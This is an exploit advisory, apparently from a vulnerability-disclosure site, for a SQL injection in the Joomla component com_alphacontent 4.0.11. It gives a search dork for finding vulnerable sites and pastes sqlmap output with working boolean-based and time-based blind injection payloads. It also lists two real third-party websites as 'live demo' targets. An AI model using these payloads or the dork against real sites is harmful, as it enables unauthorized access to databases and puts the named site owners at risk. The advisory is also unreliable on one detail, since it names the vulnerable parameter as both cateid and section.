Joomla COM_ALPHACONTENT 4.0.11 SQL injection Vulnerability *youtube

2017.06.11
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

+----------------------------- +|R|A|M|A|D|A|N|K|A|R|I|M +--> +----------------------------- / Exploit Title : Joomla COM_ALPHACONTENT 4.0.11 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_alphacontent # version : 4.0.11 # Tested on: [Ubuntu 17.04] # MyBlog : http://xbadgirl21.blogspot.com # Date: 11-06-2017 # video Proof : https://youtu.be/Wlwa9afLSJ8 \ To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz +----------------------------- ###################### /|X|B|A|D|G|I|R|L|2|1|/ ###################### | [+] PoC : | +##################### | [cateid] Get Parameter Vulnerable To SQLi + http://127.0.0.1/index.php?option=com_alphacontent&section=8&Itemid=227&lang=uk +##################### | [+] SQLmap PoC: +##################### +Parameter: section (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: option=com_alphacontent&section=1' AND 6151=6151 AND 'xCYf'='xCYf&Itemid=1&lang=en-us + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: option=com_alphacontent&section=1' AND SLEEP(5) AND 'jOoI'='jOoI&Itemid=1&lang=en-us --- ##################### / [!] Live Demo : / ##################### + http://www.waliwa.com/index.php?option=com_alphacontent&section=1&Itemid=1&lang=en-us + http://www.sworld.com.ua/index.php?option=com_alphacontent&section=8&Itemid=227&lang=uk ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers #####################

References:

https://youtu.be/Wlwa9afLSJ8


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top